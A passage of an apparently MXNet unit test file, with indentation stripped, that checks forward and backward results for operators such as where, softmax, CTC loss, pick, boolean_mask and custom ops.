for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
nparr = ndarr.asnumpy()
assert_almost_equal(nparr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
dtype_softmax_np = dtype_softmax.asnumpy()
ref_softmax_np = ref_softmax.asnumpy()
assert_almost_equal(dtype_softmax_np, ref_softmax_np, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
dtype_grad_np = dtype_input.grad.asnumpy()
ref_grad_np = ref_input.grad.asnumpy()
assert_almost_equal(dtype_grad_np, ref_grad_np, rtol=grad_rtol, atol=grad_atol)
import sys
is_windows = sys.platform.startswith('win')
enforce_safe_acc = os.environ.get("MXNET_SAFE_ACCUMULATION", "0")
if not is_windows or enforce_safe_acc == "1":
os.environ["MXNET_SAFE_ACCUMULATION"] = "1"
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)], rtol=1e-2, atol=1e-3, dtype="asnumpy")
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for _ in range(100):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0]
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
@with_seed()
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
check_ctc_loss(acts, labels, true_loss)
check_contrib_ctc_loss(acts, labels, true_loss)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels2, true_loss)
check_contrib_ctc_loss(acts2, labels2, true_loss)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
check_ctc_loss(acts2, labels3, true_loss)
check_contrib_ctc_loss(acts2, labels3, true_loss)
@with_seed()
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss.asnumpy(), expected_loss)
@with_seed()
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss_grad(blank_label): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l.asnumpy(), loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad.asnumpy(), grad_truth, atol=1e-5, rtol=1e-5)
check_ctc_loss_grad('first')
check_ctc_loss_grad('last')
check_contrib_ctc_loss_grad('first')
check_contrib_ctc_loss_grad('last')
@with_seed()
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
assert same(qa.asnumpy(), qa_real.asnumpy())
assert same(a_.asnumpy(), a_real.asnumpy())
@with_seed()
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
@with_seed()
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
@with_seed()
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
@with_seed()
def test_reciprocal_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 6 below set empirically, depends on eps.
# Issue exposed by seed 879579887.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 6*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
@with_seed()
def test_cbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid finite difference method inaccuracies due to infinite gradient at the origin.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 553872106.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=eps)
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
@with_seed()
def test_rcbrt_op():
eps = 2**(-11)
data_tmp = np.random.rand(3, 4) * 10 - 5
# Avoid possible division by 0 errors and finite difference method inaccuracies.
# Factor of 4 below set empirically, depends on eps.
# Issue exposed by seed 788174893.
# Replace problematic inputs with 1.0.
data_tmp[abs(data_tmp) < 4*eps] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp], numeric_eps = eps)
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
@with_seed()
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
